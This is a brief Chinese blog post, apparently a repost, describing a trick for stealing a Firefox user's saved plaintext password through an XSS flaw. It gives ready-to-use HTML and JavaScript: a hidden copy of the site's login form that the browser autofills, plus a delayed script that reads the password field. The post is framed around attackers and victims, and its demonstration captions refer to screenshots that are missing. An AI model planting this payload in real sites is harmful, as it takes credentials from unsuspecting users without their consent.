如果受害者使用火狐浏览器,并有使用“记住密码”的习惯。那么在这种场景下我们就可以通过一个XSS来获取目标用户的明文密码。
步骤一,先去目标站点的登录页面,找form:
<form method="POST" action=""><input type="text" name="username" /><input type="password" id="lulz" name="lulz"/><input type="submit"/></form>
找到之后记住关键input的name或id。
步骤二,在具有xss漏洞的页面中写入这样的代码:
<form method="POST" action="" style=display:none><input type="text" name="username" /><input type="password" id="lulz" name="lulz"/><input type="submit"/></form>
<script>setTimeout("alert('Saved password stolen through XSS: ' + document.getElementById('lulz').value)",1000);</script>
当受害者打开我们植入了上述代码的页面时,即可截获用户的明文密码。
下面是简单的演示:
受害者在某站登录了自己的账号,并选择了记住密码:
攻击者在目标站点发现了XSS漏洞,并构造了如下的页面:
当受害者访问攻击者特制的页面时,明文密码将被截获:
————————————-
ps:其实通过xss获取浏览器保存的明文密码的原理很简单:浏览器保存某个网站的密码后,当下次遇到该网站的相同表单时会自动填充保存的密码,因此我们可以通过xss伪造与登录页面相同的表单,这样浏览器就会自动填充,我们获取填充后的value值就可以获取明文密码了。不过要注意,浏览器不会立马填充表单,因此我们要延迟一定时间再去读表单内容,即上面代码中使用setTimeout延迟执行的原因。
转载请注明:jinglingshu的博客 » firefox小技巧 XSS截取用户明文密码
